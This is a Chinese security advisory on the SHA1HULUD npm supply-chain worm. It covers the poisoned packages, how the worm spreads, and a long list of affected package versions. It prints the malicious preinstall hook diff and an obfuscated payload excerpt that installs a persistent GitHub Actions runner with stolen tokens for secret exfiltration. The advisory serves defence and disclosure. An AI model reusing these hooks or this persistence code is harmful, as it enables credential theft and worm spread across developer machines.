SHA1HULUD蠕虫再现：超300NPM包被投毒、 2万仓库信息被窃取

目录隐藏

一、概述

2025年11月24日，墨菲安全实验室检测到数小时内NPM仓库中超过300个组件被相同的方式投毒，这些包在NPM仓库中发布的新版本仿冒引入Bun运行时，引入 preinstall: node setup_bun.js，以及混淆的 bun_environment.js 文件。

在执行时会下载并运行 TruffleHog 对本机进行扫描，窃取其中的 NPM Token、AWS/GCP/Azure 凭据以及环境变量等敏感信息。

恶意代码会通过创建名为SHA1HULUD的GitHub action runner实现信息窃取，与2025年9月的Shai-Hulud攻击事件可能为同一攻击者，当前受影响GitHub仓库超过2万个。

二、投毒行为分析

以@asyncapi/specs组件为例，通过对比NPM与GitHub仓库（https://github.com/asyncapi/spec-json-schemas）中的代码可以发现GitHub仓库并未受影响。

对比新老版本可以发现攻击者通过修改package.json引入了setup_bun.js

diff --git a/package.json b/package.json
index v6.8.1..v6.8.2 100644
--- a/package.json
+++ b/package.json
@@ -1,10 +1,11 @@
 {
   "name": "@asyncapi/specs",
-  "version": "6.8.1",
+  "version": "6.8.2",
   "description": "AsyncAPI schema versions",
   "main": "index.js",
   "types": "index.d.ts",
   "scripts": {
+    "preinstall": "node setup_bun.js",
     "test": "npm run build && vitest run && npm run validate:schemas",
     "build": "npm run bundle",
     "generate:assets": "npm run build",

setup_bun.js仿冒进行bun相关设置代码，在其中调用bun_environment.js

const environmentScript = path.join(__dirname, 'bun_environment.js');
if (fs.existsSync(environmentScript)) {
    runExecutable(bunExecutable, [environmentScript]);
  } else {
    process.exit(0);
  }

bun_environment.js 是一个高度混淆的恶意JavaScript文件，体积超过10MB，内置大量信息窃取逻辑。

其主要目的是收集环境中的敏感信息（AWS、Azure、GCP、GitHub、NPM 凭证），利用 TruffleHog 进行密钥扫描，并通过GitHub Action进行外发。

同时，会根据当前环境中的npm配置信息，修改package.json内容，写入setup_bun.js与 bun_environment.js，重新打包后以窃取的 Token 执行 npm publish，从而实现蠕虫传播。

if (a0_0x584cd0[_0x4f4186(21596)]() === "linux") await Bun["$"] `mkdir -p $HOME/.dev-env/`, await Bun["$"] `curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)] + _0x4f4186(8640))[_0x4f4186(3934)](), await Bun["$"] `tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz` ["cwd"](a0_0x584cd0[_0x4f4186(2400)] + _0x4f4186(8640)), await Bun["$"] `RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${_0x3012a7}/${_0x10c210} --unattended --token ${_0x5ee686} --name "SHA1HULUD"` ["cwd"](a0_0x584cd0[_0x4f4186(2400)] + _0x4f4186(8640))[_0x4f4186(3934)](), await Bun["$"] `rm actions-runner-linux-x64-2.330.0.tar.gz` ["cwd"](a0_0x584cd0["homedir"] + _0x4f4186(8640)), Bun["spawn"](["bash", "-c", "cd $HOME/.dev-env && nohup ./run.sh &"])[_0x4f4186(22716)]();
else {
    if (a0_0x584cd0[_0x4f4186(21596)]() === _0x4f4186(5417)) await Bun["$"] `powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-win-x64-2.330.0.zip -OutFile actions-runner-win-x64-2.330.0.zip"` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)]()), await Bun["$"] `powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"actions-runner-win-x64-2.330.0.zip\", \".\")"` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)]()), await Bun["$"] `./config.cmd --url https://github.com/${_0x3012a7}/${_0x10c210} --unattended --token ${_0x5ee686} --name "SHA1HULUD"` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)]())[_0x4f4186(3934)](), Bun[_0x4f4186(18285)](["powershell", "-ExecutionPolicy", _0x4f4186(6132), _0x4f4186(20344), _0x4f4186(6696)], {
        "cwd": a0_0x584cd0[_0x4f4186(2400)]()
    })[_0x4f4186(22716)]();
    else {
        if (a0_0x584cd0["platform"]() === _0x4f4186(18673)) await Bun["$"] `mkdir -p $HOME/.dev-env/`, await Bun["$"] `curl -o actions-runner-osx-arm64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-osx-arm64-2.330.0.tar.gz` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)] + _0x4f4186(8640))[_0x4f4186(3934)](), await Bun["$"] `tar xzf ./actions-runner-osx-arm64-2.330.0.tar.gz` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)] + "/.dev-env"), await Bun["$"] `./config.sh --url https://github.com/${_0x3012a7}/${_0x10c210} --unattended --token ${_0x5ee686} --name "SHA1HULUD"` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)] + _0x4f4186(8640))[_0x4f4186(3934)](), await Bun["$"] `rm actions-runner-osx-arm64-2.330.0.tar.gz` [_0x4f4186(9258)](a0_0x584cd0[_0x4f4186(2400)] + "/.dev-env"), Bun[_0x4f4186(18285)]([_0x4f4186(2383), "-c", _0x4f4186(23911)])[_0x4f4186(22716)]();
    }
}

恶意代码会创建.github/workflows/formatter_123456789.yml恶意workflow文件，创建名为SHA1HULUD的GitHub action runner，通过workflow将仓库中的secrets通过两次base64编码打包成actionsSecrets.json

解码后窃取的密钥信息格式如下：

[{
    "EC2_SSH_KEY": "",
    "github_token": "",
    "AWS_OPENVPN_CLIENT_KEY": "",
    "SLACK_GHA_NOTIFICATION_WEBHOOK_URL_PROD": "",
    "EC2_HOST": "",
    "SLACK_GHA_NOTIFICATION_WEBHOOK_URL_DEV": "",
    "SLACK_WEBHOOK_URL": "",
    "CODECOV_TOKEN": ""
  },
  {
    "github_token": "",
    "FIREBASE_TOKEN": "",
    "SLACK_WEBHOOK_URL": ""
  },
  {
    "github_token": "",
    "EXPO_TOKEN": "",
    "SLACK_WEBHOOK_URL": ""
  },
  {
    "github_token": "",
    "AWS_S3_BUCKET": "",
    "AWS_SECRET_ACCESS_KEY": "",
    "AWS_ACCESS_KEY_ID": ""
  },
  {
    "github_token": "",
    "WEBFLOW_TOKEN": "",
    "WEBFLOW_COLLECTION_ID": ""
  },
  {
    "github_token": "",
    "CODECOV_TOKEN": ""
  }]

当前超过2万个GitHub仓库受影响：

三、受影响组件列表

组件名	版本	周下载量
@zapier/zapier-sdk	0.15.5	2636363
@zapier/zapier-sdk	0.15.7	2636363
@posthog/core	1.5.6	1983172
posthog-node	5.11.3	1551681
posthog-node	5.13.3	1551681
posthog-node	4.18.1	1551681
@asyncapi/specs	6.10.1	1439127
@asyncapi/specs	6.8.2	1439127
@asyncapi/specs	6.9.1	1439127
@asyncapi/specs	6.8.3	1439127
@postman/tunnel-agent	0.6.6	1222937
@postman/tunnel-agent	0.6.5	1222937
posthog-react-native	4.12.5	552084
posthog-react-native	4.11.1	552084
@asyncapi/parser	3.4.1	454054
@asyncapi/parser	3.4.2	454054
@asyncapi/openapi-schema-parser	3.0.25	172615
@asyncapi/avro-schema-parser	3.0.25	163621
@asyncapi/avro-schema-parser	3.0.26	163621
@asyncapi/protobuf-schema-parser	3.6.1	141222
@asyncapi/protobuf-schema-parser	3.5.3	141222
@asyncapi/react-component	2.6.6	130613
@asyncapi/generator	2.8.5	83589
@posthog/ai	7.1.2	70906
@asyncapi/modelina	5.10.2	68730
@asyncapi/modelina	5.10.3	68730
@asyncapi/generator-react-sdk	1.1.4	67985
@asyncapi/generator-react-sdk	1.1.5	67985
@postman/csv-parse	4.0.3	57070
@postman/csv-parse	4.0.4	57070
@postman/csv-parse	4.0.5	57070
posthog-react-native-session-replay	1.2.2	56023
@asyncapi/converter	1.6.3	51156
@asyncapi/multi-parser	2.2.1	49289
@asyncapi/multi-parser	2.2.2	49289
@posthog/cli	0.5.15	49272
@zapier/secret-scrubber	1.1.3	42438
@zapier/secret-scrubber	1.1.4	42438
@zapier/secret-scrubber	1.1.5	42438
zapier-platform-schema	18.0.2	38559
zapier-platform-core	18.0.2	38186
zapier-platform-core	18.0.3	38186
@ensdomains/address-encoder	1.1.5	37524
@ensdomains/content-hash	3.0.1	35779
crypto-addr-codec	0.1.9	34882
@asyncapi/nunjucks-filters	2.1.1	34226
@asyncapi/nunjucks-filters	2.1.2	34226
@asyncapi/bundler	0.6.5	33328
@asyncapi/bundler	0.6.6	33328
@posthog/nextjs-config	1.5.1	33129
@asyncapi/html-template	3.3.2	30340
@asyncapi/html-template	3.3.3	30340
@asyncapi/diff	0.5.1	29988
@asyncapi/diff	0.5.2	29988
@asyncapi/cli	4.1.2	29857
@asyncapi/optimizer	1.0.5	28860
@asyncapi/optimizer	1.0.6	28860
@asyncapi/modelina-cli	5.10.2	28041
@asyncapi/modelina-cli	5.10.3	28041
@postman/aether-icons	2.23.2	25176
@postman/aether-icons	2.23.4	25176
@asyncapi/generator-components	0.3.2	23453
@asyncapi/generator-helpers	0.2.1	21886
@asyncapi/generator-helpers	0.2.2	21886
zapier-platform-cli	18.0.3	21470
@posthog/rrweb	0.0.31	12666
ethereum-ens	0.8.1	12656
@posthog/rrweb-utils	0.0.31	12630
@posthog/rrweb-snapshot	0.0.31	12629
@posthog/rrdom	0.0.31	12627
@asyncapi/problem	1.0.1	12111
@asyncapi/problem	1.0.2	12111
@postman/secret-scanner-wasm	2.1.3	9731
@postman/secret-scanner-wasm	2.1.2	9731
@postman/secret-scanner-wasm	2.1.4	9731
@ensdomains/eth-ens-namehash	2.0.16	8578
posthog-docusaurus	2.0.6	6432
@postman/pretty-ms	6.1.1	4587
@postman/pretty-ms	6.1.3	4587
@postman/pretty-ms	6.1.2	4587
web-types-lit	0.1.1	4482
mcp-use	1.4.2	4071
mcp-use	1.4.3	4071
@posthog/react-rrweb-player	1.1.4	4062
@asyncapi/markdown-template	1.6.8	3630
@asyncapi/markdown-template	1.6.9	3630
@ensdomains/buffer	0.1.2	3493
@postman/node-keytar	7.9.4	3453
@postman/node-keytar	7.9.5	3453
@postman/node-keytar	7.9.6	3453
@mcp-use/inspector	0.6.2	3439
@mcp-use/inspector	0.6.3	3439
@mcp-use/cli	2.2.6	3327
@zapier/spectral-api-ruleset	1.9.1	3209
@zapier/spectral-api-ruleset	1.9.2	3209
@zapier/spectral-api-ruleset	1.9.3	3209
@posthog/geoip-plugin	0.0.8	3051
@ensdomains/dnsprovejs	0.5.3	2908
@ensdomains/solsha1	0.0.4	2893
@asyncapi/web-component	2.6.6	2689
@asyncapi/web-component	2.6.7	2689
@posthog/nuxt	1.2.9	2362
@zapier/browserslist-config-zapier	1.0.3	1961
@zapier/browserslist-config-zapier	1.0.5	1961
@posthog/wizard	1.18.1	1945
react-native-use-modal	1.0.3	1865
@asyncapi/java-spring-template	1.6.1	1825
@asyncapi/java-spring-template	1.6.2	1825
@posthog/rrweb-record	0.0.31	1761
@posthog/siphash	1.1.2	1742
@posthog/piscina	3.2.1	1741
@ensdomains/ens-validation	0.1.1	1734
@posthog/plugin-contrib	0.0.6	1732
@posthog/agent	1.24.1	1660
@postman/postman-mcp-server	2.4.11	1448
@postman/postman-mcp-server	2.4.10	1448
@asyncapi/nodejs-ws-template	0.10.1	1406
@asyncapi/nodejs-ws-template	0.10.2	1406
@actbase/react-daum-postcode	1.0.5	1221
token.js-fork	0.7.32	1109
@postman/pm-bin-windows-x64	1.24.5	708
@postman/pm-bin-windows-x64	1.24.4	708
@ensdomains/ens-avatar	1.0.4	685
@postman/pm-bin-linux-x64	1.24.3	671
@postman/pm-bin-linux-x64	1.24.4	671
@postman/pm-bin-linux-x64	1.24.5	671
@posthog/hedgehog-mode	0.0.42	635
create-mcp-use-app	0.5.3	521
create-mcp-use-app	0.5.4	521
@postman/pm-bin-macos-arm64	1.24.5	469
@postman/pm-bin-macos-arm64	1.24.3	469
@postman/pm-bin-macos-arm64	1.24.4	469
@posthog/nextjs	0.0.3	401
@postman/pm-bin-macos-x64	1.24.3	337
@postman/pm-bin-macos-x64	1.24.5	337
redux-router-kit	1.2.2	320
redux-router-kit	1.2.3	320
redux-router-kit	1.2.4	320
@ensdomains/dnssecoraclejs	0.2.9	309
@postman/mcp-ui-client	5.5.1	270
@postman/mcp-ui-client	5.5.2	270
@postman/postman-mcp-cli	1.0.5	258
@postman/postman-mcp-cli	1.0.4	258
@zapier/babel-preset-zapier	6.4.1	256
@zapier/babel-preset-zapier	6.4.3	256
@ensdomains/thorin	0.6.51	213
@postman/postman-collection-fork	4.3.3	195
@postman/postman-collection-fork	4.3.4	195
@postman/postman-collection-fork	4.3.5	195
@asyncapi/nodejs-template	3.0.5	187
@postman/wdio-allure-reporter	0.0.9	183
@postman/wdio-junit-reporter	0.0.4	181
@postman/wdio-junit-reporter	0.0.6	181
@postman/final-node-keytar	7.9.1	175
@postman/final-node-keytar	7.9.2	175
zapier-async-storage	1.0.1	163
zapier-async-storage	1.0.2	163
zapier-async-storage	1.0.3	163
@ensdomains/test-utils	1.3.1	153
@ensdomains/hardhat-chai-matchers-viem	0.1.15	148
@asyncapi/java-spring-cloud-stream-template	0.13.5	147
@asyncapi/java-spring-cloud-stream-template	0.13.6	147
@zapier/eslint-plugin-zapier	11.0.3	147
@zapier/eslint-plugin-zapier	11.0.4	147
@zapier/eslint-plugin-zapier	11.0.5	147
devstart-cli	1.0.6	143
@asyncapi/java-template	0.3.5	129
@asyncapi/java-template	0.3.6	129
@asyncapi/go-watermill-template	0.2.76	119
@asyncapi/go-watermill-template	0.2.77	119
@asyncapi/python-paho-template	0.2.14	112
@asyncapi/python-paho-template	0.2.15	112
@ensdomains/hardhat-toolbox-viem-extended	0.0.6	106
@ensdomains/vite-plugin-i18next-loader	4.0.4	104
zapier-platform-legacy-scripting-runner	4.0.3	103
zapier-platform-legacy-scripting-runner	4.0.4	103
@asyncapi/server-api	0.16.25	91
@ensdomains/offchain-resolver-contracts	0.2.2	88
@zapier/ai-actions	0.1.18	81
@zapier/ai-actions	0.1.19	81
@zapier/ai-actions	0.1.20	81
@zapier/mcp-integration	3.0.1	74
@zapier/mcp-integration	3.0.3	74
@ensdomains/ens-archived-contracts	0.0.3	73
@ensdomains/dnssec-oracle-anchors	0.0.2	72
@ensdomains/mock	2.1.52	66
zapier-scripts	7.8.3	65
zapier-scripts	7.8.4	65
@quick-start-soft/quick-task-refine	1.4.2511142126	56
@zapier/ai-actions-react	0.1.13	54
@zapier/ai-actions-react	0.1.14	54
@quick-start-soft/quick-git-clean-markdown	1.4.2511142126	49
@ensdomains/ui	3.4.6	49
@quick-start-soft/quick-markdown	1.4.2511142126	47
@zapier/stubtree	0.1.3	46
@ensdomains/unruggable-gateways	0.0.3	30
@posthog/rrweb-player	0.0.31	26
@asyncapi/dotnet-rabbitmq-template	1.0.1	25
@asyncapi/dotnet-rabbitmq-template	1.0.2	25
@ensdomains/react-ens-address	0.0.32	24
@asyncapi/php-template	0.1.1	21
@quick-start-soft/quick-document-translator	1.4.2511142126	20
@quick-start-soft/quick-markdown-image	1.4.2511142126	20
@strapbuild/react-native-date-time-picker	2.0.4	17
github-action-for-generator	2.1.28	17
@actbase/react-kakaosdk	0.9.27	16
bytecode-checker-cli	1.0.8	16
@markvivanco/app-version-checker	1.0.1	16
bytecode-checker-cli	1.0.9	16
@markvivanco/app-version-checker	1.0.2	16
bytecode-checker-cli	1.0.10	16
@louisle2/cortex-js	0.1.6	16
orbit-boxicons	2.1.3	16
react-native-worklet-functions	3.3.3	15
poper-react-sdk	0.1.2	13
@ensdomains/web3modal	1.10.2	13
gate-evm-tools-test	1.0.5	12
n8n-nodes-tmdb	0.5.1	12
gate-evm-tools-test	1.0.6	12
gate-evm-tools-test	1.0.7	12
capacitor-plugin-purchase	0.1.1	11
expo-audio-session	0.2.1	9
capacitor-plugin-apptrackingios	0.0.21	9
asyncapi-preview	1.0.1	8
asyncapi-preview	1.0.2	8
@actbase/react-absolute	0.8.3	8
@actbase/react-native-devtools	0.1.3	8
@posthog/variance-plugin	0.0.8	7
@posthog/twitter-followers-plugin	0.0.8	6
medusa-plugin-momo	0.0.68	6
scgs-capacitor-subscribe	1.0.11	6
gate-evm-check-code2	2.0.3	6
gate-evm-check-code2	2.0.4	6
gate-evm-check-code2	2.0.5	6
lite-serper-mcp-server	0.2.2	6
@asyncapi/edavisualiser	1.2.1	5
@asyncapi/edavisualiser		5
esbuild-plugin-eta	0.1.1	5
@ensdomains/server-analytics	0.0.2	5
zuper-stream	2.0.9	5
@quick-start-soft/quick-markdown-compose	1.4.2506300029	4
@posthog/snowflake-export-plugin	0.0.8	4
@actbase/react-native-kakao-channel	1.0.2	4
@posthog/sendgrid-plugin	0.0.8	4
evm-checkcode-cli	1.0.12	4
@ensdomains/subdomain-registrar	0.2.4	4
claude-token-updater	1.0.3	4
evm-checkcode-cli	1.0.13	4
evm-checkcode-cli	1.0.14	4
@trigo/atrix-pubsub	4.0.3	4
@trigo/hapi-auth-signedlink	1.3.1	4
@strapbuild/react-native-perspective-image-cropper-poojan31	0.4.6	3
axios-builder	1.2.1	3
calc-loan-interest	1.0.4	3
medusa-plugin-announcement	0.0.3	3
open2internet	0.1.1	3
@ensdomains/cypress-metamask	1.2.1	3
@ensdomains/renewal	0.0.13	3
cpu-instructions	0.0.14	3
orbit-soap	0.43.13	3
@asyncapi/keeper	0.0.2	2
@strapbuild/react-native-perspective-image-cropper-2	0.4.7	2
@actbase/react-native-actionsheet	1.0.3	2
@posthog/ingestion-alert-plugin	0.0.8	2
@actbase/react-native-simple-video	1.0.13	2
@actbase/react-native-kakao-navi	2.0.4	2
medusa-plugin-zalopay	0.0.40	2
@kvytech/medusa-plugin-newsletter	0.0.5	2
@posthog/databricks-plugin	0.0.8	2
@asyncapi/keeper	0.0.3	2
capacitor-voice-recorder-wav	6.0.3	2
create-hardhat3-app	1.1.1	2
rollup-plugin-httpfile	0.2.1	2
@ensdomains/name-wrapper	1.0.1	2
create-hardhat3-app	1.1.2	2
test-foundry-app	1.0.3	2
jan-browser	0.13.1	2
@mparpaillon/page	1.0.1	2
go-template	0.1.8	1
@strapbuild/react-native-perspective-image-cropper	0.4.15	1
manual-billing-system-miniapp-api	1.3.1	1
korea-administrative-area-geo-json-util	1.0.7	1
@posthog/currency-normalization-plugin	0.0.8	1
@posthog/web-dev-server	1.0.5	1
@posthog/pagerduty-plugin	0.0.8	1
@posthog/event-sequence-timer-plugin	0.0.8	1
@posthog/automatic-cohorts-plugin	0.0.8	1
@posthog/first-time-event-tracker	0.0.8	1
@actbase/css-to-react-native-transform	1.0.3	1
@posthog/url-normalizer-plugin	0.0.8	1
@posthog/twilio-plugin	0.0.8	1
@actbase/node-server	1.1.19	1
@posthog/gitub-star-sync-plugin	0.0.8	1
@seung-ju/react-native-action-sheet	0.2.1	1
@posthog/maxmind-plugin	0.1.6	1
@posthog/github-release-tracking-plugin	0.0.8	1
@actbase/react-native-fast-image	8.5.13	1
@posthog/customerio-plugin	0.0.8	1
@posthog/kinesis-plugin	0.0.8	1
@actbase/react-native-less-transformer	1.0.6	1
@posthog/taxonomy-plugin	0.0.8	1
medusa-plugin-product-reviews-kvy	0.0.4	1
@aryanhussain/my-angular-lib	0.0.23	1
dotnet-template	0.0.4	1
capacitor-plugin-scgssigninwithgoogle	0.0.5	1
capacitor-purchase-history	0.0.10	1
@posthog/plugin-unduplicates	0.0.8	1
posthog-plugin-hello-world	1.0.1	1
esbuild-plugin-httpfile	0.4.1	1
@ensdomains/blacklist	1.0.1	1
@ensdomains/renewal-widget	0.1.10	1
@ensdomains/hackathon-registrar	1.0.5	1
@ensdomains/ccip-read-router	0.0.7	1
@mcp-use/mcp-use	1.0.1	1
test-hardhat-app	1.0.3	1
zuper-cli	1.0.1	1
skills-use	0.1.2	1
typeorm-orbit	0.2.27	1
orbit-nebula-editor	1.0.2	1
@trigo/atrix-elasticsearch	2.0.1	1
@trigo/atrix-soap	1.0.2	1
eslint-config-zeallat-base	1.0.4	0
iron-shield-miniapp	0.0.2	0
shinhan-limit-scrap	1.0.3	0
create-glee-app	0.2.3	0
@seung-ju/next	0.0.2	0
@actbase/react-native-tiktok	1.1.3	0
discord-bot-server	0.1.2	0
@seung-ju/openapi-generator	0.0.4	0
@seung-ju/react-hooks	0.0.2	0
@actbase/react-native-naver-login	1.0.1	0
@kvytech/medusa-plugin-announcement	0.0.8	0
@kvytech/components	0.0.2	0
@kvytech/cli	0.0.7	0
@kvytech/medusa-plugin-management	0.0.5	0
@kvytech/medusa-plugin-product-reviews	0.0.9	0
@kvytech/web	0.0.2	0
scgsffcreator	1.0.5	0
vite-plugin-httpfile	0.2.1	0
@ensdomains/curvearithmetics	1.0.1	0
@ensdomains/reverse-records	1.0.1	0
@ensdomains/ccip-read-dns-gateway	0.1.1	0
@ensdomains/unicode-confusables	0.1.1	0
@ensdomains/durin-middleware	0.0.2	0
@ensdomains/ccip-read-worker-viem	0.0.4	0
atrix	1.0.1	0
@caretive/caret-cli	0.0.2	-1
exact-ticker	0.3.5	-1
@orbitgtbelgium/orbit-components	1.2.9	-1
react-library-setup	0.0.6	-1
@orbitgtbelgium/mapbox-gl-draw-scale-rotate-mode	1.1.1	-1
orbit-nebula-draw-tools	1.0.10	-1
@orbitgtbelgium/time-slider	1.0.187	-1
react-element-prompt-inspector	0.1.18	-1
@trigo/pathfinder-ui-css	0.1.1	-1
eslint-config-trigo	22.0.2	-1
@trigo/fsm	3.4.2	-1
@trigo/atrix	7.0.1	-1
@trigo/atrix-postgres	1.0.3	-1
trigo-react-app	4.1.2	-1
@trigo/eslint-config-trigo	3.3.1	-1
@trigo/bool-expressions	4.1.3	-1
@trigo/trigo-hapijs	5.0.1	-1
@trigo/node-soap	0.5.4	-1
@trigo/jsdt	0.2.1	-1
bool-expressions	0.1.2	-1
@trigo/atrix-redis	1.0.2	-1
@trigo/atrix-acl	4.0.2	-1
@trigo/atrix-orientdb	1.0.2	-1
@trigo/atrix-mongoose	1.0.2	-1
atrix-mongoose	1.0.1	-1
redux-forge	2.5.3	-1
@trigo/keycloak-api	1.3.1	-1
@mparpaillon/connector-parse	1.0.1	-1
@mparpaillon/imagesloaded	4.1.2	-1
@alaan/s2s-auth	2.0.3	-1

SHA1HULUD蠕虫再现：超300NPM包被投毒、 2万仓库信息被窃取

一、概述

二、投毒行为分析

三、受影响组件列表

相关推荐

Apache OFBiz 任意文件读取和 SSRF 漏洞 (CVE-2023-50968)

Dataease jdbc 反序列化漏洞 (CVE-2024-23328)

XXL-JOB <2.4.0 XSS漏洞 (CVE-2023-48088)

glibc __vsyslog_internal 本地提权漏洞 (CVE-2023-6246)

NPM组件 @angular_devkit/core 等窃取主机敏感信息